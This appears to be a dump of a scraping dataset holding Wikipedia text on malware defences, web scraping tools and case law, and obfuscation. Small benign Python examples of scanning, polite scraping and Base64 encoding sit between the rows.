passwords and enabling two-factor authentication can reduce this risk. With the latter enabled, even if an attacker can crack the password, they cannot use the account without also having the token possessed by the legitimate user of that account. Homogeneity can be a vulnerability. For example, when all computers in a network run the same operating system, upon exploiting one, one worm can exploit them all: 80 In particular, Microsoft Windows or Mac OS X have such a large share of the market that an exploited vulnerability concentrating on either operating system could subvert a large number of systems. It is estimated that approximately 83% of malware infections between January and March 2020 were spread via systems running Windows 10. 81 This risk is mitigated by segmenting the networks into different subnetworks and setting up firewalls to block traffic between them. 82 83 Anti-malware (sometimes also called antivirus) programs block and remove some or all types of malware. For example, Microsoft Security Essentials (for Windows XP, Vista, and Windows 7) and Windows Defender (for Windows 8, 10 and 11) provides real-time protection. The Windows Malicious Software Removal Tool removes malicious software from the system. 84 Additionally, several capable antivirus software programs are available for free download from the Internet (usually restricted to non-commercial use). 85 Tests found some free programs to be competitive with commercial ones. 85 86 87 Typically, antivirus software can combat malware in the following ways: A specific component of anti-malware software, commonly referred to as an on-access or real-time scanner, hooks deep into the operating system's core or kernel and functions in a manner similar to how certain malware itself would attempt to operate, though with the user's informed permission for protecting the system. 
Any time the operating system accesses a file, the on-access scanner checks if the file is infected or not. Typically, when an infected file is found, execution is stopped and the file is quarantined to prevent further damage with the intention to prevent irreversible system damage. Most AVs allow users to override this behaviour. This can have a considerable performance impact on the operating system, though the degree of impact is dependent on how many pages it creates in virtual memory. 91 Sandboxing is a security model that confines applications within a controlled environment, restricting their operations to authorized "safe" actions and isolating them from other applications on the host. It also limits access to system resources like memory and the file system to maintain isolation. 89 Browser sandboxing is a security measure that isolates web browser processes and tabs from the operating system to prevent malicious code from exploiting vulnerabilities. It helps protect against malware, zero-day exploits, and unintentional data leaks by trapping potentially harmful code within the sandbox. It involves creating separate processes, limiting access to system resources, running web content in isolated processes, monitoring system calls, and memory constraints. Inter-process communication (IPC) is used for secure communication between processes. Escaping the sandbox involves targeting vulnerabilities in the sandbox mechanism or the operating system's sandboxing features. 90 92 While sandboxing is not foolproof, it significantly reduces the attack surface of common threats. Keeping browsers and operating systems updated is crucial to mitigate vulnerabilities. 90 92 Website vulnerability scans check the website, detect malware, may note outdated software, and may report known security issues, in order to reduce the risk of the site being compromised. Structuring a network as a set of smaller networks, and limiting the flow of traffic between them to that known to be legitimate, can hinder the ability of infectious malware to replicate itself across the wider network. Software-defined networking provides techniques to implement such controls. As a last resort, computers can be protected from malware, and the risk of infected computers disseminating trusted information can be greatly reduced by imposing an "air gap" (i.e. completely disconnecting them from all other networks) and applying enhanced controls over the entry and exit of software and data from the outside world. However, malware can still cross the air gap in some situations, not least due to the need to introduce software into the air-gapped network and can damage the availability or integrity of assets thereon. Stuxnet is an example of malware that is introduced to the target environment via a USB drive, causing damage to processes supported on the environment without the need to exfiltrate data. AirHopper, 93 BitWhisper, 94 GSMem 95 and Fansmitter 96 are four techniques introduced by researchers that can leak data from air-gapped computers using electromagnetic, thermal and acoustic emissions. Utilizing bibliometric analysis, the study of malware research trends from 2005 to 2015, considering criteria such as impact journals, highly cited articles, research areas, number of publications, keyword frequency, institutions, and authors, revealed an annual growth rate of 34.1%. North America led in research output, followed by Asia and Europe. China and India were identified as emerging contributors. 97 |
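Returning to the signature-based static analysis described earlier in this entry: at its simplest, a scanner hashes a file and compares the digest against a database of known-bad signatures. The sketch below is a toy illustration only; the "database" holds a single placeholder digest, and real products use far richer signatures and heuristics.

import hashlib
from pathlib import Path

# Toy signature database of SHA-256 digests (placeholder value, not real malware).
KNOWN_BAD_SHA256 = {
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}

def scan_file(path):
    # Hash the file contents and flag it if the digest matches a known signature.
    digest = hashlib.sha256(Path(path).read_bytes()).hexdigest()
    return digest in KNOWN_BAD_SHA256

# scan_file("suspect.bin")  # hypothetical file name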
426 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#United_States | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
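The JSON "data feed" style of scraping mentioned above can be sketched with the requests library imported at the top of this notebook. The endpoint and record format are hypothetical; the point is only that the client polls structured JSON instead of parsing HTML.

import time
import requests

FEED_URL = "https://example.com/api/listings"  # hypothetical JSON endpoint

def poll_feed(url, interval=60, cycles=3):
    # Poll the feed a few times and report record IDs not seen before.
    seen = set()
    for _ in range(cycles):
        resp = requests.get(url, timeout=10)
        resp.raise_for_status()
        for record in resp.json():  # assumes the endpoint returns a JSON list
            if record.get("id") not in seen:
                seen.add(record.get("id"))
                print("new record:", record.get("id"))
        time.sleep(interval)

# poll_feed(FEED_URL)  # left commented out: the URL above is a placeholder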
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
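Both extraction approaches mentioned above, regular-expression matching and XPath queries over a parsed DOM tree, can be shown in a short sketch. The HTML snippet is invented, and the XPath part assumes the lxml package is available in addition to the re module imported earlier.

import re
from lxml import html  # assumed installed; pip install lxml

page = """<html><body>
  <p>Contact: sales@example.com, price $19.99</p>
  <div class="item"><span class="name">Widget</span></div>
</body></html>"""

# 1) Regular-expression matching directly on the raw markup
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.]+", page)
prices = re.findall(r"\$\d+(?:\.\d{2})?", page)

# 2) XPath query over the parsed DOM tree
tree = html.fromstring(page)
names = tree.xpath('//div[@class="item"]/span[@class="name"]/text()')

print(emails, prices, names)  # ['sales@example.com'] ['$19.99'] ['Widget']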
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include BeautifulSoup (a Python library that provides simple methods for extracting data from HTML and XML files); Scrapy (an open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it); Octoparse (a no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills); ParseHub (another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites); Apify (a platform that offers a wide range of scraping tools and the ability to create custom scrapers); and InstantAPI.ai (an AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization). Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping would be a violation of contract law. It would also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
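Whatever combination of counter-measures a site operator chooses, a scraper can at least honour the site's robots.txt rules and keep its request rate modest. Below is a minimal, hedged sketch using the standard library's urllib.robotparser together with requests; the base URL and user-agent string are placeholders.

import time
import requests
from urllib.robotparser import RobotFileParser

BASE = "https://example.com"          # hypothetical target site
USER_AGENT = "polite-research-bot"    # placeholder user-agent string

rp = RobotFileParser()
rp.set_url(BASE + "/robots.txt")
rp.read()                             # fetch and parse the site's robots.txt

def polite_get(path, delay=2.0):
    # Fetch a path only if robots.txt allows it, then pause before returning.
    url = BASE + path
    if not rp.can_fetch(USER_AGENT, url):
        print("Disallowed by robots.txt:", url)
        return None
    resp = requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=10)
    time.sleep(delay)                 # crude rate limiting between requests
    return resp

# polite_get("/some/page")            # commented out: the base URL is a placeholder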
427 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Obfuscation | Obfuscation is the obscuring of the intended meaning of communication by making the message difficult to understand, usually with confusing and ambiguous language. The obfuscation might be either unintentional or intentional (although intent usually is connoted), and is accomplished with circumlocution (talking around the subject), the use of jargon (technical language of a profession), and the use of an argot (ingroup language) of limited communicative value to outsiders. 1 In expository writing, unintentional obfuscation usually occurs in draft documents, at the beginning of composition; such obfuscation is illuminated with critical thinking and editorial revision, either by the writer or by an editor. Etymologically, the word obfuscation derives from the Latin obfuscatio, from obfusc re (to darken); synonyms include the words beclouding and abstrusity. Doctors are faulted for using jargon to conceal unpleasant facts from a patient; the American author and physician Michael Crichton said that medical writing is a "highly skilled, calculated attempt to confuse the reader". The psychologist B. F. Skinner said that medical notation is a form of multiple audience control, which allows the doctor to communicate to the pharmacist things which the patient might oppose if they could understand medical jargon. 2 "Eschew obfuscation", also stated as "eschew obfuscation, espouse elucidation", is a humorous fumblerule used by English teachers and professors when lecturing about proper writing techniques. Literally, the phrase means "avoid being unclear" or "avoid being unclear, support being clear", but the use of relatively uncommon words causes confusion in much of the audience (those lacking the vocabulary), making the statement an example of irony, and more precisely a heterological phrase. The phrase has appeared in print at least as early as 1959, when it was used as a section heading in a NASA document. 3 An earlier similar phrase appears in Mark Twain's Fenimore Cooper's Literary Offenses, where he lists rule fourteen of good writing as "eschew surplusage". Obfuscation of oral or written communication achieves a degree of secure communication without a need to rely upon technology. This technique is sometimes referred to as "talking around" and is a form of security through obscurity. A notable example of obfuscation of written communication is a message sent by September 11 attacks ringleader Mohamed Atta to other conspirators prior to the attacks occurring: 4 The semester begins in three more weeks. We've obtained 19 confirmations for studies in the faculty of law, the faculty of urban planning, the faculty of fine arts and the faculty of engineering. In this obfuscated message, the following code words are believed to exist: 5 Within the illegal drug trade, obfuscation is commonly used in communication to hide the occurrence of drug trafficking. A common spoken example is "420", used as a code word for cannabis, a drug which, despite some recent prominent decriminalization changes, remains illegal in most places. The Drug Enforcement Administration reported in July 2018 a total of 353 different code words used for cannabis. 6 In white-box cryptography, obfuscation refers to the protection of cryptographic keys from extraction when they are under the control of the adversary, e.g., as part of a DRM scheme. 
7 In network security, obfuscation refers to methods used to obscure an attack payload from inspection by network protection systems. |
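As a toy illustration of this network-security sense of the word (not of any real attack technique), a simple reversible encoding such as Base64 changes how a payload looks to naive pattern matching while providing no secrecy at all:

import base64

payload = b"hello world"                  # stand-in for any byte string
obfuscated = base64.b64encode(payload)    # bytes look nothing like the original
recovered = base64.b64decode(obfuscated)  # but the transformation is trivially reversed

print(obfuscated)                         # b'aGVsbG8gd29ybGQ='
print(recovered == payload)               # True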
428 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-10 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include BeautifulSoup, a Python library that provides simple methods for extracting data from HTML and XML files; Scrapy, an open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it; Octoparse, a no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills; ParseHub, another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites; Apify, a platform that offers a wide range of scraping tools and the ability to create custom scrapers; and InstantAPI.ai, an AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping.
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use should be brought to the users' attention in order for a browse wrap contract or license to be enforced.
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms of use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive 